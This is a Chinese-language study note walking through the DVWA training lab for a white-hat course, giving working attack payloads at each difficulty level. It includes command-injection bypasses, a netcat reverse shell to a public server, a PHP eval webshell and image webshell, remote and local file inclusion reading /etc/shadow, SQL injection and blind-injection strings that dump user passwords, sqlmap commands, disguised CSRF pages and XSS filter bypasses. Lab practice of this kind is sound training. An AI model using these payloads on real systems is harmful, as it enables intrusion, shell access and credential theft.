阿 Sir,给个机会啦

环境搭建

网易白帽的实战课程基于 DVWA, 使用 phpstudy 可轻松搭建

DVWA 官网: http://www.dvwa.co.uk/

phpstudy 官网: http://www.phpstudy.net/

课程详情: http://mooc.study.163.com/smartSpec/detail/1001227001.htm

暴力破解(Brute Force)

生成字典

  • 使用 cewl 生成网站的关键字文件:
1
cewl -H 'Cookie:security=low; PHPSESSID=5bim5pkm2df3u4d55rrbki60m2' -w cewl_dvwa.txt -m 4 http://192.168.56.101/DVWA/vulnerabilities/brute/
  • 微调关键字文件

  • 使用 john 生成字典:

1
john --wordlist=cewl_dvwa.txt --rules --stdout > john_dvwa.txt

开始暴力破解

工具:

  • Burp Suite
  • OWASP ZAP

命令注入(Command Injection)

Low 等级

1
127.0.0.1&&net user

Medium 等级

1
2
3
4
## 绕过方式1
127.0.0.1&net user
## 绕过方式2
127.0.0.1&;&ipconfig

High 等级

1
127.0.0.1|net user

EXP

双引号绕过

net user <=> n""et us""er

延时注入

1
2
3
4
## windows
ping 127.0.0.1 -n 5 > nul
## linux
sleep 5

远程请求

1
2
3
4
## windows
ping, telnet
## linux
wget, curl

Linux 命令注入拿 shell

1
2
## 公网服务器
nc -lp 1691 -v
1
2
## 受害服务器注入命令
nc.traditional -e /bin/bash 公网服务器IP 1691 &

跨站请求伪造(CSRF)

1
2
3
4
5
6
7
8
9
10
<html>
<head></head>
<body>
<form action="http://192.168.56.101/DVWA/vulnerabilities/csrf" method="GET">
<input name="password_new" type="hidden" value="hacker">
<input name="password_conf" type="hidden" value="hacker">
<input value="Click Me" name="Change" type="submit">
</form>
</body>
</html>
1
2
3
4
5
<img src="http://192.168.56.101/DVWA/vulnerabilities/csrf/?password_new=hacker&password_conf=hacker&Change=Change" border="0" style="display:none;"/>

<h1>404<h1>

<h2>file not found.<h2>

文件包含(File Inclusion)

Low 等级

本地文件包含

1
2
3
4
## linux
http://192.168.56.101/DVWA/vulnerabilities/fi/?page=/etc/shadow
## windows
http://192.168.56.101/DVWA/vulnerabilities/fi/?page=C:\Windows\win.ini

远程文件包含

1
http://192.168.56.101/DVWA/vulnerabilities/fi/?page=http://xxx.xxx.xxx.xxx/phpinfo.txt
1
2
3
4
## http://xxx.xxx.xxx.xxx/phpinfo.txt
<?php
phpinfo();
?>

Medium 等级

本地文件包含不受影响

远程文件包含通过双写 http:// 绕过替换规则

1
http://192.168.56.101/DVWA/vulnerabilities/fi/?page=htthttp://p://xxx.xxx.xxx.xxx/phpinfo.txt

High 等级

使用 file 协议绕过防护策略

需要配合文件上传漏洞

1
http://192.168.56.101/DVWA/vulnerabilities/fi/?page=file://C:\Windows/win.ini

文件上传(File Upload)

工具推荐: 开源菜刀

https://github.com/Chora10/Cknife

Low 等级

一句话木马 + 菜刀

1.php

1
2
3
<?php
@eval($_POST['webshell']);
?>

Medium 等级

文件包含 + 文件上传

1
mv 1.php 1.jpg

因为 DVWA 要登录, 所以上菜刀之前要在请求头加 Cookie

1
http://192.168.56.101/DVWA/vulnerabilities/fi/?page=hthttp://tp://192.168.56.101/DVWA/hackable/uploads/1.p.jpg

High 等级

制作图片马

Windows 命令:

1
copy 1.jpg/b+1.php 1.php.jpg

EXP

<?php phpinfo(); ?> 马 + 文件包含漏洞就能爆出物理路径

SQL 回显注入(SQL Injection)

Low 等级

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
?id=1'

?id=1' and '1'='1

?id=1' and '1'='2

?id=1' union select 1,2--

?id=1' union select 1,database()--

?id=1' union select 1,table_name from information_schema.tables where table_schema='dvwa'--

?id=1' union select 1,column_name from information_schema.columns where table_name='users'--

?id=1' union select user,password from users--

Medium 等级

请求改成了 POST => 用 Burp Suite 注入

过滤了 ` 字符 => 所以表名需要进行 16 进制转换

High 等级

和 Low 等级一样

用 sqlmap 的话需要设置 --second-order= 参数

SQL 盲注(SQL Injection [Blind])

手工盲注

单字符 ASCII 码范围: 0-127

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
?id=1'

?id=1' and '1'='1

?id=1' and '1'='2

?id=1' and length(database())>1--

?id=1' and length(database())=4--

?id=1' and ascii(substr(database(),1,1))>64--

?id=1' and ascii(substr(database(),1,1))>96--

?id=1' and ascii(substr(database(),1,1))>112--

?id=1' and ascii(substr(database(),1,1))>99--

?id=1' and ascii(substr(database(),1,1))=100--


?id=1' and ascii(substr(database(),2,1))>64--

...

?id=1' and ascii(substr(database(),3,1))>64--

...

?id=1' and ascii(substr(database(),4,1))>64--

...

详细手工盲注过程见: http://www.freebuf.com/articles/web/120985.html

High 等级 sqlmap 命令

1
sqlmap -u 'http://192.168.56.101/DVWA/vulnerabilities/sqli_blind/cookie-input.php#' --cookie='id=1; security=high; PHPSESSID=65qich1muubkouce3c83acia70' --data='id=1&Submit=Submit' --second-order='http://192.168.56.101/DVWA/vulnerabilities/sqli_blind/' -D dvwa --tables

跨站脚本(XSS)

Low 等级

1
<script>alert(1)</script>
1
http://192.168.56.101/DVWA/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E#

Medium 等级

双写绕过

1
<sc<script>ript>alert(1)</script>
1
http://192.168.56.101/DVWA/vulnerabilities/xss_r/?name=%3Csc%3Cscript%3Eript%3Ealert%281%29%3C%2Fscript%3E#

大小写混淆绕过

1
<ScRipt>alert(1)</script>
1
http://192.168.56.101/DVWA/vulnerabilities/xss_r/?name=%3CScRipt%3Ealert%281%29%3C%2Fscript%3E#

High

标签事件绕过

1
<img src='x' onerror=alert(1)>
1
http://192.168.56.101/DVWA/vulnerabilities/xss_r/?name=%3Cimg+src%3D%27x%27+onerror%3Dalert%281%29%3E#

标签事件列表: http://www.w3school.com.cn/tags/html_ref_eventattributes.asp

更多资料